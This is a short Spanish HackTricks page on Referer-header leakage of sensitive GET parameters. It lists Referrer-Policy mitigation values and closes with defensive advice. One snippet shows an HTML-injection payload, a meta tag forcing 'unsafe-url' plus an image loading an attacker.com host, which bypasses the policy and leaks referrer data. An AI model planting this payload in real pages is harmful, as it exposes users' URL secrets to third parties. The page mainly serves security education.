2.4 KiB
{% hint style="success" %}
Aprende y practica AWS Hacking: Entrenamiento de HackTricks AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: Entrenamiento de HackTricks GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Encabezados de Referente y política
Referente es el encabezado utilizado por los navegadores para indicar cuál fue la página anterior visitada.
Información sensible filtrada
Si en algún momento dentro de una página web se encuentra información sensible en los parámetros de una solicitud GET, si la página contiene enlaces a fuentes externas o un atacante es capaz de hacer/sugerir (ingeniería social) que el usuario visite una URL controlada por el atacante. Podría ser capaz de extraer la información sensible dentro de la última solicitud GET.
Mitigación
Puedes hacer que el navegador siga una política de Referente que podría evitar que la información sensible se envíe a otras aplicaciones web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contramedida
Puedes anular esta regla utilizando una etiqueta meta de HTML (el atacante necesita explotar una inyección de HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Defensa
Nunca coloque datos sensibles dentro de los parámetros GET o rutas en la URL.